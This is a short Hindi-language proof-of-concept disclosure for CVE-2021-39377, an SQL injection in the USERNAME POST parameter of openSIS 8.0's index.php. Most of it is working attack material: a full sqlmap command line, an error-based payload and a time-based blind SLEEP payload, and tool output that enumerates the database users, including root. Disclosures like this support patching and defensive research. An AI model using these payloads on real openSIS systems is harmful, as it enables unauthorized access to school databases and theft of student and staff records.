
CVE-2021-39377 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, openSIS 8.0 में username पैरामीटर के माध्यम से एक SQL इंजेक्शन भेद्यता, जो एरर-आधारित और टाइम-आधारित ब्लाइंड हमलों के जरिए डेटाबेस पर कब्ज़ा करने में सक्षम बनाती है।
openSIS के संस्करण 8.0 में SQL इंजेक्शन भेद्यता मौजूद है, जब MySQL (MariaDB) का उपयोग एप्लिकेशन डेटाबेस के रूप में किया जा रहा हो। एक दुर्भावनापूर्ण हमलावर कमजोर username= पैरामीटर के माध्यम से MySQL (MariaDB) डेटाबेस को SQL कमांड जारी कर सकता है।
कमजोर PHP पेज:
index.php - username पैरामीटर
कमजोर पेलोड
sqlmap "http://localhost:8081/index.php" --users --data="USERNAME=admin&PASSWORD=test1234%21&language=en&log=" --dbms="MySQL" --level=3 --risk=2
SQL इंजेक्शन:
http://localhost:8081/index.php
Parameter: USERNAME (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: USERNAME=admin') AND (SELECT 4391 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(4391=4391,1))),0x716b717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IzoO&PASSWORD=test1234!&language=en&log=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: USERNAME=admin') AND (SELECT 2137 FROM (SELECT(SLEEP(5)))BwzJ)-- sbsL&PASSWORD=test1234!&language=en&log=
[22:35:47] [INFO] testing MySQL
[22:35:47] [INFO] confirming MySQL
[22:35:47] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.4.21
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[22:35:47] [INFO] fetching database users
database management system users [3]:
[*] 'mariadb.sys'@'localhost'
[*] 'mysql'@'localhost'
[*] 'root'@'localhost'
Nathan Johnson द्वारा खोजा गया, अगस्त 2021